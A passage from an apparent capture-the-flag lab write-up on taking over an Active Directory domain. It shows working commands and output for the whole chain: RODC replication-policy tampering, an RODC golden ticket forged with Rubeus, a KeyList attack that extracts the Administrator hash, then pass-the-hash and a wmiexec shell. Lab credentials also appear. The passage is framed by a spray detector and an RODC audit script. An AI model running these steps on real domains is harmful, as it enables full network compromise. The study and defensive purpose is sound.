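    {"time": "2026-01-22T15:10:02", "ip": "192.168.8.9", "user": "LucasEther", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:03", "ip": "192.168.8.9", "user": "NathanZen", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:04", "ip": "192.168.8.9", "user": "VictoriaVoid", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:05", "ip": "192.168.8.9", "user": "SamuelStorm", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:06", "ip": "192.168.8.9", "user": "OliviaVoid", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:07", "ip": "192.168.8.9", "user": "MargaretStorm", "substatus": "0xC0000071"},
    {"time": "2026-01-22T15:10:08", "ip": "192.168.8.9", "user": "CharlieCloud", "substatus": "0xC0000071"},
    # Benign noise: one user mistyping their own password twice from a workstation.
    {"time": "2026-01-22T15:12:30", "ip": "192.168.8.26", "user": "NathanZen", "substatus": "0xC000006A"},
    {"time": "2026-01-22T15:12:41", "ip": "192.168.8.26", "user": "NathanZen", "substatus": "0xC000006A"},
]


def detect_spray(events: List[Dict[str, str]],
                 window: timedelta = timedelta(minutes=5),
                 min_accounts: int = 5) -> List[Dict]:
    """Flag sources whose failed logons touched at least min_accounts distinct
    accounts inside one window. Emits one alert per source (its busiest window)
    and lists the accounts whose password was evidently already correct."""
    by_source = defaultdict(list)
    for ev in events:
        by_source[ev["ip"]].append(
            (datetime.fromisoformat(ev["time"]), ev["user"], ev["substatus"]))
    alerts = []
    for ip, rows in by_source.items():
        rows.sort()
        best = None
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            users = {r[1] for r in in_window}
            if len(users) >= min_accounts and (best is None or len(users) > len(best["accounts"])):
                best = {
                    "source": ip,
                    "first_seen": start.isoformat(),
                    "accounts": sorted(users),
                    # Expired-password failures prove the password itself was right.
                    "valid_but_expired": sorted({r[1] for r in in_window if r[2] == "0xC0000071"}),
                    "reasons": sorted({SUBSTATUS.get(r[2], r[2]) for r in in_window}),
                }
        if best is not None:
            alerts.append(best)
    return alerts
```

A source that trips this rule with a non-empty valid_but_expired list deserves a password reset for every listed account, not just a lockout of the source.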
Change a password, then collect BloodHound data to see which user is the most valuable.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# bloodyAD --host 192.168.8.12 -d vertexsoft.local -u IsabellaTech -p 'Nt5w0V4?Ff' set password ADAM.SILVER Admin123
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 10, in <module>
sys.exit(main())
^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 342, in main
asyncio.run(amain())
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 195, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/base_events.py", line 691, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 272, in amain
output = await result
^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/cli_modules/set.py", line 126, in password
ldap = await conn.getLdap()
^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/config.py", line 154, in getLdap
self._ldap = await Ldap.create(self)
^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 211, in create
raise e
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 199, in create
raise err
badldap.commons.exceptions.LDAPBindException: invalidCredentials — Reason:(SEC_E_LOGON_DENIED) The logon attempt failed.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u IsabellaTech -p 'Nt5w0V4?Ff' -M change-password -o NEWPASS=Admin123
SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
CHANGE-P... 192.168.8.12 445 RODC [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc0020017 - RPC_NT_SERVER_UNAVAILABLE - The RPC server is unavailable.
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.8.12 -u CharlieCloud -p 'u!6vDaGQOA' -d vertexsoft.local -r disk:share=/root/Desktop/ChunQiu/Vertex
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
We get in as a local administrator.
The password can be changed through rdesktop here.
mmmmmm mmmm mmmmm mmmm
##""""## ##""## ##"""## ##""""#
## ## ## ## ## ## ##"
####### ## ## ## ## ##
## "##m ## ## ## ## ##m
## ## ##mm## ##mmm## ##mmmm#
"" """ """" """"" """"
flag{13dff5f0-370d-420f-a111-189675d7b157}
9. flag08 192.168.8.12
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u CharlieCloud -p 'Admin123'
SMB 192.168.8.12 445 RODC [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.8.12 445 RODC [+] vertexsoft.local\CharlieCloud:Admin123 (Pwn3d!)
9.1. Bloodhound
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# rusthound-ce -u CharlieCloud -p Admin123 -d vertexsoft.local -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 10:32:38 on 01/22/26
Powered by @g0h4n_0
---------------------------------------------------
[2026-01-22T15:32:38Z INFO rusthound_ce] Verbosity level: Info
[2026-01-22T15:32:38Z INFO rusthound_ce] Collection method: All
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Connected to VERTEXSOFT.LOCAL Active Directory!
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Starting data collection...
[2026-01-22T15:32:38Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:39Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=vertexsoft,DC=local
[2026-01-22T15:32:39Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:41Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:41Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:43Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:43Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2026-01-22T15:32:43Z INFO rusthound_ce::objects::domain] MachineAccountQuota: 10
[2026-01-22T15:32:43Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2026-01-22T15:32:43Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 131 users parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 4 computers parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 1 domains parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] 77 containers parsed!
[2026-01-22T15:32:43Z INFO rusthound_ce::json::maker::common] .//20260122103243_vertexsoft-local_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 10:32:43 on 01/22/26! Happy Graphing!
9.2. RODC Golden tickets
https://www.thehacker.recipes/ad/movement/builtins/rodc#rodc
https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/rodc-golden-tickets
Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity "RODC$" -Set @{'msDS-RevealOnDemandGroup'='CN=Administrator,CN=Users,DC=VERTEXSOFT,DC=LOCAL'}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity "RODC$" -Properties msDS-RevealOnDemandGroup
msds-revealondemandgroup
------------------------
CN=Administrator,CN=Users,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink
DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName : RODC.vertexsoft.local
Enabled : True
msDS-KrbTgtLink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name : RODC
ObjectClass : computer
ObjectGUID : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName : RODC$
SID : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :
RID : 00000453 (1107)
User : krbtgt_4156
LM :
NTLM : 34e335179246ef930dc33fd1e3de6e9e
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : vertexsoft.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'
[*] AuthTime : 1/23/2026 12:22:32 AM
[*] StartTime : 1/23/2026 12:22:32 AM
[*] EndTime : 1/23/2026 10:22:32 AM
[*] RenewTill : 1/30/2026 12:22:32 AM
[*] base64(ticket.kirbi):
[+] Ticket successfully imported!
Now retrieve it:
PS C:\Users\CharlieCloud\Desktop> nltest /dsgetdc:vertexsoft.local /writable
DC: \\DC.vertexsoft.local
Address: \\192.168.1.11
Dom Guid: 73f6ee42-1629-410f-91b3-06ee3e06dedc
Dom Name: vertexsoft.local
Forest Name: vertexsoft.local
Dc Site Name: Default-First-Site-Name
Our Site Name: Default-First-Site-Name
Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 KEYLIST
The command completed successfully
Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket: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
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# echo "doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==" | base64 -d > admin.kirbi
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# nxc smb 192.168.1.11 -u administrator -H EBC447441306783742EE3DF769051B75
SMB 192.168.1.11 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.1.11 445 DC [+] vertexsoft.local\administrator:EBC447441306783742EE3DF769051B75 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# impacket-wmiexec 'vertexsoft.local/administrator@192.168.1.11' -hashes :EBC447441306783742EE3DF769051B75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users
C:\users>cd administrator
C:\users\administrator>dir
Volume in drive C has no label.
Volume Serial Number is DE1E-1DFE
Directory of C:\users\administrator
01/23/2026 12:40 AM <DIR> .
07/11/2024 08:42 PM <DIR> ..
07/11/2024 08:42 PM <DIR> 3D Objects
07/11/2024 08:42 PM <DIR> Contacts
07/17/2024 12:42 PM <DIR> Desktop
07/11/2024 08:42 PM <DIR> Documents
07/11/2024 08:42 PM <DIR> Downloads
07/11/2024 08:42 PM <DIR> Favorites
07/17/2024 01:45 PM <DIR> flag
07/11/2024 08:42 PM <DIR> Links
07/11/2024 08:42 PM <DIR> Music
07/11/2024 08:42 PM <DIR> Pictures
07/11/2024 08:42 PM <DIR> Saved Games
07/11/2024 08:42 PM <DIR> Searches
07/11/2024 08:42 PM <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 27,860,480,000 bytes free
C:\users\administrator>cd flag
C:\users\administrator\flag>type flag.txt
flag{81c860d4-5da1-40d6-bdba-33dc58b3c035}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-RevealOnDemandGroup' | Select-Object -ExpandProperty 'msDS-RevealOnDemandGroup'
CN=Administrator,CN=Users,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Set @{'msDS-RevealOnDemandGroup'=@(
>> 'CN=Administrator,CN=Users,DC=vertexsoft,DC=local'
>> )}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-NeverRevealGroup' | Select-Object -ExpandProperty 'msDS-NeverRevealGroup'
CN=Denied RODC Password Replication Group,CN=Users,DC=vertexsoft,DC=local
CN=Account Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Server Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Backup Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Administrators,CN=Builtin,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Clear 'msDS-NeverRevealGroup'
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity RODC$
logoncount : 23
msds-krbtgtlink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
iscriticalsystemobject : True
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION, PARTIAL_SECRETS_ACCOUNT
distinguishedname : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
objectclass : {top, person, organizationalPerson, user...}
displayname : RODC$
lastlogontimestamp : 1/22/2026 7:28:56 PM
name : RODC
operatingsystemversion : 10.0 (20348)
usncreated : 49201
msds-authenticatedatdc : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
samaccountname : RODC$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
msds-revealedusers : {B:96:A000090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:7D00090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE396320000000000009632000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:5E00090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:5A00090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local...}
accountexpires : NEVER
countrycode : 0
whenchanged : 1/22/2026 4:43:28 PM
instancetype : 4
msdfsr-computerreferencebl : CN=RODC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=vertexsoft,DC=local
objectguid : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
operatingsystem : Windows Server 2022 Datacenter
lastlogon : 1/22/2026 7:29:11 PM
msds-revealeddsas : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local...}
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
dscorepropagationdata : {7/17/2024 4:45:07 AM, 7/11/2024 1:16:42 PM, 7/11/2024 1:13:22 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/RODC.vertexsoft.local, HOST/RODC/VERTEXSOFT, HOST/RODC.vertexsoft.local/VERTEXSOFT, GC/RODC.vertexsoft.local/vertexsoft.local...}
serverreferencebl : CN=RODC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vertexsoft,DC=local
whencreated : 7/11/2024 1:13:22 PM
badpasswordtime : 1/22/2026 7:28:56 PM
badpwdcount : 0
managedby : CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local
cn : RODC
msds-revealondemandgroup : CN=Administrator,CN=Users,DC=vertexsoft,DC=local
objectsid : S-1-5-21-1670446094-1720415002-1380520873-1106
primarygroupid : 521
msds-authenticatedtoaccountlist : {CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=WIN-CORP16,CN=Computers,DC=vertexsoft,DC=local, CN=WIN-CORP36-1,CN=Computers,DC=vertexsoft,DC=local...}
pwdlastset : 1/22/2026 7:28:56 PM
msds-supportedencryptiontypes : 28
usnchanged : 49861
lastlogoff : 1/1/1601 8:00:00 AM
dnshostname : RODC.vertexsoft.local
PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink
DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName : RODC.vertexsoft.local
Enabled : True
msDS-KrbTgtLink : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name : RODC
ObjectClass : computer
ObjectGUID : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName : RODC$
SID : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :
PS C:\Users\CharlieCloud\Desktop> Get-ADUser krbtgt_4156 -Properties msDS-SecondaryKrbTgtNumber,msDS-KrbTGTLinkBl
DistinguishedName : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Enabled : False
GivenName :
msDS-KrbTGTLinkBl : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local}
msDS-SecondaryKrbTgtNumber : 4156
Name : krbtgt_4156
ObjectClass : user
ObjectGUID : f72de4ed-84c3-4b2d-b6d0-05d55795b8cf
SamAccountName : krbtgt_4156
SID : S-1-5-21-1670446094-1720415002-1380520873-1107
Surname :
UserPrincipalName :
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Build TGT
[*] Building PAC
[*] Domain : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : vertexsoft.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'
[*] AuthTime : 1/23/2026 12:45:14 AM
[*] StartTime : 1/23/2026 12:45:14 AM
[*] EndTime : 1/23/2026 10:45:14 AM
[*] RenewTill : 1/30/2026 12:45:14 AM
[*] base64(ticket.kirbi):
PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:<base64 ticket.kirbi from the golden step above>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting 'rc4_hmac' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: DC.vertexsoft.local (192.168.1.11)
[+] TGS request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/VERTEXSOFT.LOCAL
ServiceRealm : VERTEXSOFT.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : VERTEXSOFT.LOCAL
StartTime : 1/23/2026 12:45:31 AM
EndTime : 1/23/2026 10:45:14 AM
RenewTill : 1/1/0001 8:00:00 AM
Flags : name_canonicalize, pre_authent
KeyType : rc4_hmac
Base64(key) : HAm0llxNsQLPoVUV1+Qhhg==
Password Hash : EBC447441306783742EE3DF769051B75
PS C:\Users\CharlieCloud\Desktop>
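The steps above weaken the RODC's Password Replication Policy (Administrator added to msDS-RevealOnDemandGroup, msDS-NeverRevealGroup cleared) so that a TGT forged with the RODC's krbtgt_4156 key can be exchanged for Administrator's NT hash via a KeyList TGS request. The following audit is an added example, not part of the writeup or its tooling: it assumes the ActiveDirectory module, read access to the domain, and the default deny list seen in the output above, and flags every RODC whose policy has drifted from it.

```powershell
# Added audit example (not from the writeup): report RODCs whose Password Replication
# Policy has been weakened the way the steps above show. Assumes the ActiveDirectory
# module and the Windows default msDS-NeverRevealGroup entries; adjust for your domain.
Import-Module ActiveDirectory

$domainDn = (Get-ADDomain).DistinguishedName

# Principals that should never be revealable to an RODC: the built-in Administrator
# plus the five defaults that Get-DomainObject listed in msDS-NeverRevealGroup above.
$neverRevealPrefixes = @(
    'CN=Administrator,CN=Users,',
    'CN=Denied RODC Password Replication Group,CN=Users,',
    'CN=Account Operators,CN=Builtin,',
    'CN=Server Operators,CN=Builtin,',
    'CN=Backup Operators,CN=Builtin,',
    'CN=Administrators,CN=Builtin,'
)
# The deny list itself should still contain the five defaults (index 1..5).
$expectedDenied = $neverRevealPrefixes[1..5] | ForEach-Object { $_ + $domainDn }

# primaryGroupID 521 = Read-only Domain Controllers (as seen on the RODC$ object above).
$rodcs = Get-ADComputer -Filter 'primaryGroupID -eq 521' `
    -Properties msDS-RevealOnDemandGroup, msDS-NeverRevealGroup, msDS-RevealedUsers, msDS-KrbTgtLink

foreach ($rodc in $rodcs) {
    $findings = @()

    # A privileged principal in the allow list is the first change made above.
    foreach ($dn in @($rodc.'msDS-RevealOnDemandGroup')) {
        if ($neverRevealPrefixes | Where-Object { $dn -like "$_*" }) {
            $findings += "privileged principal in msDS-RevealOnDemandGroup: $dn"
        }
    }
    # An emptied or trimmed deny list is the second change made above.
    foreach ($dn in $expectedDenied) {
        if (@($rodc.'msDS-NeverRevealGroup') -notcontains $dn) {
            $findings += "missing from msDS-NeverRevealGroup: $dn"
        }
    }
    # msDS-RevealedUsers is DN-with-binary ("B:96:<hex>:<DN>"); the DN follows the last colon.
    # Assumption: the AD module returns these values as strings in that format.
    foreach ($entry in @($rodc.'msDS-RevealedUsers' | Where-Object { $_ })) {
        $dn = ([string]$entry -split ':', 4)[-1]
        if ($neverRevealPrefixes | Where-Object { $dn -like "$_*" }) {
            $findings += "privileged secret already cached on the RODC: $dn"
        }
    }
    [pscustomobject]@{
        RODC       = $rodc.Name
        KrbtgtLink = $rodc.'msDS-KrbTgtLink'
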